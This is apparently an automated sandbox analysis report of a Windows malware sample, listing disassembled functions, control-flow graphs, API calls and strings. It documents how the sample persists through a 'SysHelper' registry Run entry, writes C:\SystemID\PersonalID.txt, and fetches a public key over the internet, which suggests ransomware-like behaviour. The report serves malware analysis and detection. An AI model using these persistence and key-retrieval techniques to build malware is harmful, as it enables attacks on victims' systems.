                                                                                                                            • Opcode ID: 24977ebbbd413f7a753c5d9156773f4ff39c1d6e8a582f37f4f3bec678590330
                                                                                                                            • Instruction ID: 52ad752aa3ad6bc82ea06f962b0517ac08b8f6fe1f802593fce612480d62e91a
                                                                                                                            • Opcode Fuzzy Hash: 24977ebbbd413f7a753c5d9156773f4ff39c1d6e8a582f37f4f3bec678590330
                                                                                                                            • Instruction Fuzzy Hash: 8091C0B1D052189BEF24CFA0ED59BEEBBF4AF05704F205169E40577282DBB25A48CF51
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E4BAE0 Relevance: 18.3, APIs: 12, Instructions: 320windowCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1901 e4bae0-e4bb0d 1902 e4bba0-e4bba7 1901->1902 1903 e4bb13 1901->1903 1904 e4bf3d-e4bf47 1902->1904 1905 e4bbad-e4bbae 1902->1905 1906 e4bb54-e4bb5e 1903->1906 1907 e4bb15-e4bb1a 1903->1907 1908 e4bf5c-e4bf63 1904->1908 1909 e4bf49 1904->1909 1912 e4bbd7-e4bc45 call e50c62 GetComputerNameW call e43100 call e4ce80 1905->1912 1913 e4bbb0-e4bbd4 DefWindowProcW 1905->1913 1910 e4bb64-e4bb68 1906->1910 1911 e4bf81-e4bf97 1906->1911 1914 e4bb47-e4bb4f PostQuitMessage 1907->1914 1915 e4bb1c-e4bb1f 1907->1915 1917 e4bf65-e4bf71 IsWindow 1908->1917 1918 e4bf9a-e4bfc2 DefWindowProcW 1908->1918 1916 e4bf50-e4bf54 1909->1916 1919 e4bb75-e4bb9d DefWindowProcW 1910->1919 1920 e4bb6a-e4bb6e 1910->1920 1935 e4bc47-e4bc4c 1912->1935 1936 e4bc7b-e4bc80 1912->1936 1914->1911 1915->1911 1922 e4bb25-e4bb28 1915->1922 1916->1918 1923 e4bf56-e4bf5a 1916->1923 1917->1911 1924 e4bf73-e4bf7b DestroyWindow 1917->1924 1920->1910 1925 e4bb70 1920->1925 1922->1913 1927 e4bb2e-e4bb31 1922->1927 1923->1908 1923->1916 1924->1911 1925->1911 1927->1911 1929 e4bb37-e4bb42 call e41cd0 1927->1929 1929->1917 1937 e4bc4e-e4bc57 call e52587 1935->1937 1938 e4bc5a-e4bc76 call e445a0 1935->1938 1939 e4bc82-e4bc8b call e52587 1936->1939 1940 e4bc8e-e4bcb1 1936->1940 1937->1938 1938->1936 1939->1940 1944 e4bcb3-e4bcbc call e52587 1940->1944 1945 e4bcbf-e4bcf1 call e50bed 1940->1945 1944->1945 1952 e4bcf7-e4bcfa 1945->1952 1953 e4befb-e4bf0f IsWindow 1945->1953 1954 e4bd00-e4bd04 1952->1954 1955 e4bf11-e4bf18 1953->1955 1956 e4bf28-e4bf2d 1953->1956 1957 e4bee5-e4bef1 1954->1957 1958 e4bd0a-e4bd0e 1954->1958 1955->1956 1959 e4bf1a-e4bf22 DestroyWindow 1955->1959 1956->1911 1960 e4bf2f-e4bf3b call e52587 1956->1960 1957->1954 1962 e4bef7-e4bef9 1957->1962 1958->1957 1961 e4bd14-e4bd7b call e44690 * 2 call e3eff0 1958->1961 1959->1956 1960->1911 1971 e4bee1 1961->1971 1972 e4bd81-e4be44 call e4c330 call e49d10 call e4c240 call e4b680 call e4b8b0 call e44690 call e4ce80 call e431d0 1961->1972 1962->1953 1962->1956 1971->1957 1989 e4be55-e4be81 1972->1989 1990 e4be46-e4be52 call e52587 1972->1990 1991 e4be83-e4be8c call e52587 1989->1991 1992 e4be8f-e4bedf CreateThread 1989->1992 1990->1989 1991->1992 1992->1957
                                                                                                                            APIs
                                                                                                                            • PostQuitMessage.USER32(00000000), ref: 00E4BB49
                                                                                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 00E4BBBA
                                                                                                                            • _malloc.LIBCMT ref: 00E4BBE4
                                                                                                                            • GetComputerNameW.KERNEL32(00000000,?), ref: 00E4BBF4
                                                                                                                            • _free.LIBCMT ref: 00E4BCD7
                                                                                                                              • Part of subcall function 00E41CD0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,00EFAC68,000000FF), ref: 00E41D12
                                                                                                                              • Part of subcall function 00E41CD0: _memset.LIBCMT ref: 00E41D3B
                                                                                                                              • Part of subcall function 00E41CD0: RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00E41D63
                                                                                                                              • Part of subcall function 00E41CD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EFAC68,000000FF), ref: 00E41D6C
                                                                                                                              • Part of subcall function 00E41CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00E41DD6
                                                                                                                              • Part of subcall function 00E41CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00E41E48
                                                                                                                            • IsWindow.USER32(?), ref: 00E4BF69
                                                                                                                            • DestroyWindow.USER32(?), ref: 00E4BF7B
                                                                                                                            • DefWindowProcW.USER32(?,00008003,?,?), ref: 00E4BFA8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3873257347-0
                                                                                                                            • Opcode ID: 7c774ed58c4bed920f844adccc064a2859a93646b1df20b76381444e23e862ed
                                                                                                                            • Instruction ID: 789d631665497d798473d3e81bc7ce201dfe03e0400228b4bdaffac58dbbc7d8
                                                                                                                            • Opcode Fuzzy Hash: 7c774ed58c4bed920f844adccc064a2859a93646b1df20b76381444e23e862ed
                                                                                                                            • Instruction Fuzzy Hash: 71C1AD71A083449FDB20DF24EC45BAABBE0FF85319F14591DF888A72A1D771D918CB52
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E3C740 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 254COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 2147 e3c740-e3c792 call e50fdd 2150 e3c911-e3c915 2147->2150 2151 e3c798-e3c7a3 call e50546 2147->2151 2152 e3c917 2150->2152 2153 e3c944-e3c968 CreateDirectoryW call e50fdd 2150->2153 2159 e3c906-e3c90e call e53a38 2151->2159 2160 e3c7a9 2151->2160 2155 e3c920-e3c93b call e44c60 2152->2155 2164 e3c96a-e3c96c 2153->2164 2165 e3c9af-e3c9b3 2153->2165 2155->2164 2169 e3c93d-e3c942 2155->2169 2159->2150 2163 e3c7b0-e3c7c6 call e51101 2160->2163 2183 e3c8f3-e3c900 call e50546 2163->2183 2184 e3c7cc-e3c7e7 2163->2184 2171 e3ca43-e3ca47 2164->2171 2172 e3c972-e3c976 2164->2172 2167 e3c9b5 2165->2167 2168 e3c9d8-e3c9f9 call e528fd * 2 call e53a38 2165->2168 2174 e3c9b8-e3c9bc 2167->2174 2210 e3c9fe-e3ca03 2168->2210 2169->2153 2169->2155 2179 e3ca54-e3ca64 2171->2179 2180 e3ca49-e3ca51 call e52587 2171->2180 2176 e3ca3a-e3ca40 call e52587 2172->2176 2177 e3c97c 2172->2177 2181 e3c9c2 2174->2181 2182 e3c9be-e3c9c0 2174->2182 2176->2171 2186 e3c980-e3c984 2177->2186 2180->2179 2189 e3c9c4-e3c9d3 call e528fd 2181->2189 2182->2189 2183->2159 2183->2163 2190 e3c7e9-e3c7eb 2184->2190 2191 e3c7ed-e3c7f3 2184->2191 2194 e3c990-e3c9a8 2186->2194 2195 e3c986-e3c98d call e52587 2186->2195 2189->2174 2211 e3c9d5 2189->2211 2200 e3c805-e3c81e call e45c10 2190->2200 2201 e3c7f6-e3c7ff 2191->2201 2194->2186 2198 e3c9aa 2194->2198 2195->2194 2198->2176 2214 e3c861-e3c863 2200->2214 2215 e3c820-e3c822 2200->2215 2201->2201 2206 e3c801-e3c803 2201->2206 2206->2200 2210->2171 2213 e3ca05-e3ca09 2210->2213 2211->2168 2213->2176 2217 e3ca0b 2213->2217 2218 e3c865-e3c871 call e44f70 2214->2218 2219 e3c874-e3c876 2214->2219 2215->2214 2216 e3c824-e3c83c 2215->2216 2220 e3c83e-e3c84a call e44f70 2216->2220 2221 e3c84d-e3c855 2216->2221 2222 e3ca10-e3ca14 2217->2222 2218->2219 2224 e3c8d5-e3c8e3 2219->2224 2225 e3c878-e3c88f 2219->2225 2220->2221 2221->2224 2229 e3c857-e3c85f call e43160 2221->2229 2227 e3ca20-e3ca38 2222->2227 2228 e3ca16-e3ca1d call e52587 2222->2228 2230 e3c8f0 2224->2230 2231 e3c8e5-e3c8ed call e52587 2224->2231 2233 e3c891-e3c895 2225->2233 2234 e3c8a9-e3c8ae 2225->2234 2227->2176 2227->2222 2228->2227 2229->2224 2230->2183 2231->2230 2236 e3c8b5-e3c8d1 2233->2236 2240 e3c897-e3c8a7 call e505a0 2233->2240 2234->2236 2236->2224 2240->2236
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00E50FDD: __wfsopen.LIBCMT ref: 00E50FE8
                                                                                                                            • _fgetws.LIBCMT ref: 00E3C7BC
                                                                                                                            • _memmove.LIBCMT ref: 00E3C89F
                                                                                                                            • CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 00E3C94B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDirectory__wfsopen_fgetws_memmove
                                                                                                                            • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                                            • API String ID: 2864494435-54166481
                                                                                                                            • Opcode ID: 5b5e8250e982aa9e75351e9b05479add2e394d51aebff286a774f8e8b715093d
                                                                                                                            • Instruction ID: 71b4182767f26c67c0d325813c1c143b613f29980361498e4a8be8d7ea4763ac
                                                                                                                            • Opcode Fuzzy Hash: 5b5e8250e982aa9e75351e9b05479add2e394d51aebff286a774f8e8b715093d
                                                                                                                            • Instruction Fuzzy Hash: 6391A472D003199BCF21DFA4DC897AEBBF4AF44308F251529E815B3241E775EA18CB92
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E3C6A0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49registryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 2246 e3c6a0-e3c6ca RegOpenKeyExW 2247 e3c734-e3c739 2246->2247 2248 e3c6cc-e3c6fb RegQueryValueExW 2246->2248 2249 e3c6fd-e3c70b RegCloseKey 2248->2249 2250 e3c70c-e3c72e RegSetValueExW RegCloseKey 2248->2250 2250->2247
                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,00E4E6D4), ref: 00E3C6C2
                                                                                                                            • RegQueryValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,?), ref: 00E3C6F3
                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00E3C700
                                                                                                                            • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 00E3C725
                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00E3C72E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseValue$OpenQuery
                                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
                                                                                                                            • API String ID: 3962714758-1667468722
                                                                                                                            • Opcode ID: e71a4d1166f4c5cd6e8b3b5dc0c72c0b4057c559218bfe5c4a5eb42acd2d68b9
                                                                                                                            • Instruction ID: a2294586897cec3cd5a7c2b64d9c91e63990d59618ce1cc93be24e0bae2f46d5
                                                                                                                            • Opcode Fuzzy Hash: e71a4d1166f4c5cd6e8b3b5dc0c72c0b4057c559218bfe5c4a5eb42acd2d68b9
                                                                                                                            • Instruction Fuzzy Hash: D3115E7094020CFFDB119F90DD09FEEBB78EB00704F2001A5EA00B2191D7715A19EB54
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E4E6E8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 44stringnetworkfileCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 2251 e4e6e8-e4e6ef 2252 e4e6f0-e4e722 call e5b420 call e3c500 2251->2252 2257 e4e724-e4e729 2252->2257 2258 e4e72e-e4e772 InternetOpenW 2252->2258 2259 e4ea1f-e4ea40 call e53cf0 2257->2259 2260 e4e774-e4e776 2258->2260 2261 e4e778-e4e77d 2258->2261 2268 e4ea42-e4ea46 2259->2268 2269 e4ea8d-e4eacc lstrlenA lstrcpyA * 2 lstrlenA 2259->2269 2263 e4e78f-e4e7b8 call e45ae0 call e51c02 2260->2263 2264 e4e780-e4e789 2261->2264 2284 e4e882-e4e8e5 call e45ae0 call e43ff0 call e42900 call e459d0 2263->2284 2285 e4e7be-e4e7f7 call e44690 call e3dd40 2263->2285 2264->2264 2266 e4e78b-e4e78d 2264->2266 2266->2263 2271 e4ea4c-e4ea61 SHGetFolderPathA 2268->2271 2272 e4ee2a-e4ee3a call e41b10 2268->2272 2273 e4eace 2269->2273 2274 e4eaef-e4eb12 2269->2274 2271->2252 2276 e4ea67-e4ea88 PathAppendA DeleteFileA 2271->2276 2294 e4ee3c-e4ee3f 2272->2294 2295 e4ee4d-e4ee82 call e3ef50 2272->2295 2277 e4ead0-e4ead8 2273->2277 2280 e4eb14-e4eb16 2274->2280 2281 e4eb18-e4eb1f 2274->2281 2276->2252 2282 e4eada-e4eae7 lstrlenA 2277->2282 2283 e4eaeb 2277->2283 2287 e4eb2b-e4eb4f call e456d0 call e42900 2280->2287 2288 e4eb22-e4eb27 2281->2288 2282->2277 2292 e4eae9 2282->2292 2283->2274 2342 e4e8e7-e4e8f0 call e52587 2284->2342 2343 e4e8f3-e4e917 lstrcpyW 2284->2343 2309 e4e86f-e4e874 2285->2309 2310 e4e7f9-e4e7fe 2285->2310 2314 e4eb51 2287->2314 2315 e4eb53-e4eb66 lstrcpyW 2287->2315 2288->2288 2290 e4eb29 2288->2290 2290->2287 2292->2274 2300 e4e6e0-e4e6e6 2294->2300 2306 e4ee86-e4ee8c 2295->2306 2300->2252 2312 e4ee92-e4ee94 2306->2312 2313 e4ee8e-e4ee90 2306->2313 2309->2284 2323 e4e876-e4e87f call e52587 2309->2323 2316 e4e800-e4e809 call e52587 2310->2316 2317 e4e80c-e4e827 2310->2317 2320 e4ee97-e4ee9c 2312->2320 2319 e4eea0-e4eeaf call e43ea0 2313->2319 2314->2315 2321 e4eb74-e4ebe4 lstrlenA call e50c62 call e5b420 MultiByteToWideChar lstrcpyW call e53cf0 2315->2321 2322 e4eb68-e4eb71 call e52587 2315->2322 2316->2317 2325 e4e842-e4e848 2317->2325 2326 e4e829-e4e82d 2317->2326 2319->2306 2344 e4eeb1-e4eee3 call e3ef50 2319->2344 2320->2320 2328 e4ee9e 2320->2328 2366 e4ebe6-e4ebea 2321->2366 2367 e4ec3d-e4ec97 lstrlenW lstrlenA lstrcpyA * 2 lstrlenA 2321->2367 2322->2321 2323->2284 2334 e4e84e-e4e86c 2325->2334 2326->2334 2335 e4e82f-e4e840 call e505a0 2326->2335 2328->2319 2334->2309 2335->2334 2342->2343 2348 e4e943-e4e97a InternetOpenUrlW InternetReadFile 2343->2348 2349 e4e919-e4e920 2343->2349 2364 e4eee7-e4eeed 2344->2364 2353 e4e9ec-e4ea08 InternetCloseHandle * 2 2348->2353 2354 e4e97c-e4e994 SHGetFolderPathA 2348->2354 2349->2348 2356 e4e922-e4e92e 2349->2356 2360 e4ea16-e4ea19 2353->2360 2361 e4ea0a-e4ea13 call e52587 2353->2361 2354->2353 2359 e4e996-e4e9c2 PathAppendA call e520b6 2354->2359 2362 e4e937 2356->2362 2363 e4e930-e4e935 2356->2363 2359->2353 2382 e4e9c4-e4e9e9 lstrlenA call e52b02 call e53a38 2359->2382 2360->2259 2361->2360 2365 e4e93c-e4e93d lstrcatW 2362->2365 2363->2365 2370 e4eef3-e4eef5 2364->2370 2371 e4eeef-e4eef1 2364->2371 2365->2348 2366->2272 2374 e4ebf0-e4ec11 SHGetFolderPathA 2366->2374 2376 e4ecbf-e4ecdd 2367->2376 2377 e4ec99 2367->2377 2373 e4eef8-e4eefd 2370->2373 2372 e4ef01-e4ef10 call e43ea0 2371->2372 2372->2364 2393 e4ef12-e4ef4c call e43ff0 call e42900 2372->2393 2373->2373 2379 e4eeff 2373->2379 2374->2252 2381 e4ec17-e4ec38 PathAppendA DeleteFileA 2374->2381 2384 e4ece3-e4eced 2376->2384 2385 e4ecdf-e4ece1 2376->2385 2383 e4eca0-e4eca8 2377->2383 2379->2372 2381->2300 2382->2353 2388 e4ecaa-e4ecb7 lstrlenA 2383->2388 2389 e4ecbb 2383->2389 2391 e4ecf0-e4ecf5 2384->2391 2390 e4ecf9-e4ed1b call e456d0 call e42900 2385->2390 2388->2383 2395 e4ecb9 2388->2395 2389->2376 2405 e4ed1d 2390->2405 2406 e4ed1f-e4ed35 lstrcpyW 2390->2406 2391->2391 2396 e4ecf7 2391->2396 2410 e4ef50-e4ef68 lstrcpyW 2393->2410 2411 e4ef4e 2393->2411 2395->2376 2396->2390 2405->2406 2408 e4ed37-e4ed40 call e52587 2406->2408 2409 e4ed43-e4edab lstrlenA call e50c62 call e5b420 MultiByteToWideChar lstrcpyW lstrlenW 2406->2409 2408->2409 2426 e4edbc-e4edc1 2409->2426 2427 e4edad-e4edb6 lstrlenW 2409->2427 2414 e4ef76-e4efb3 call e43ff0 call e42900 2410->2414 2415 e4ef6a-e4ef73 call e52587 2410->2415 2411->2410 2431 e4efb5 2414->2431 2432 e4efb7-e4efc6 lstrcpyW 2414->2432 2415->2414 2429 e4ee10-e4ee12 2426->2429 2430 e4edc3-e4ede4 SHGetFolderPathA 2426->2430 2427->2426 2428 e4ee44-e4ee48 2427->2428 2433 e4f01a-e4f030 2428->2433 2435 e4ee14-e4ee1a call e50bed 2429->2435 2436 e4ee1d-e4ee1f 2429->2436 2430->2252 2434 e4edea-e4ee0b PathAppendA DeleteFileA 2430->2434 2431->2432 2437 e4efd4-e4efe0 2432->2437 2438 e4efc8-e4efd1 call e52587 2432->2438 2434->2300 2435->2436 2436->2272 2440 e4ee21-e4ee27 call e50bed 2436->2440 2442 e4efe2-e4efeb call e52587 2437->2442 2443 e4efee-e4f008 2437->2443 2438->2437 2440->2272 2442->2443 2448 e4f016 2443->2448 2449 e4f00a-e4f013 call e52587 2443->2449 2448->2433 2449->2448
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00E4E707
                                                                                                                              • Part of subcall function 00E3C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 00E3C51B
                                                                                                                            • InternetOpenW.WININET ref: 00E4E743
                                                                                                                            • _wcsstr.LIBCMT ref: 00E4E7AE
                                                                                                                            • _memmove.LIBCMT ref: 00E4E838
                                                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 00E4E90A
                                                                                                                            • lstrcatW.KERNEL32(?,&first=false), ref: 00E4E93D
                                                                                                                            • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00E4E954
                                                                                                                            • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00E4E96F
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00E4E98C
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00E4E9A3
                                                                                                                            • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 00E4E9CD
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00E4E9F3
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00E4E9F6
                                                                                                                            • _strstr.LIBCMT ref: 00E4EA36
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00E4EA59
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00E4EA74
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 00E4EA82
                                                                                                                            • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 00E4EA92
                                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 00E4EAA4
                                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 00E4EABA
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00E4EAC8
                                                                                                                            • lstrlenA.KERNEL32(00000022), ref: 00E4EAE3
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 00E4EB5B
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00E4EB7C
                                                                                                                            • _malloc.LIBCMT ref: 00E4EB86
                                                                                                                            • _memset.LIBCMT ref: 00E4EB94
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 00E4EBAE
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 00E4EBB6
                                                                                                                            • _strstr.LIBCMT ref: 00E4EBDA
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00E4EC00
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00E4EC24
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 00E4EC32
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Path$Internetlstrcpylstrlen$Folder$AppendFile$CloseDeleteHandleOpen_memset_strstr$ByteCharMultiReadWide_malloc_memmove_wcsstrlstrcat
                                                                                                                            • String ID: bowsakkdestx.txt${"public_key":"
                                                                                                                            • API String ID: 2805819797-1771568745
                                                                                                                            • Opcode ID: 30bf13d43eaf930ad4106a574af34d32fd48b5e2c3344190f891d59bef4d2bdc
                                                                                                                            • Instruction ID: da15d86998a47ca82b0e03318fa0fad0703a6e2c129988b7504d35fa4ca2f32b
                                                                                                                            • Opcode Fuzzy Hash: 30bf13d43eaf930ad4106a574af34d32fd48b5e2c3344190f891d59bef4d2bdc
                                                                                                                            • Instruction Fuzzy Hash: AE015231548395AAD630DF20AC09BEFBBD8BF91744F145859F984B2282EB70E60CD763
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E41B10 Relevance: 10.6, APIs: 7, Instructions: 50timewindowsleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • timeGetTime.WINMM(?,?,?,?,00E4EE2F), ref: 00E41B1E
                                                                                                                            • timeGetTime.WINMM(?,?,00E4EE2F), ref: 00E41B29
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E41B4C
                                                                                                                            • DispatchMessageW.USER32(?), ref: 00E41B5C
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E41B6A
                                                                                                                            • Sleep.KERNEL32(00000064,?,?,00E4EE2F), ref: 00E41B72
                                                                                                                            • timeGetTime.WINMM(?,?,00E4EE2F), ref: 00E41B78
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
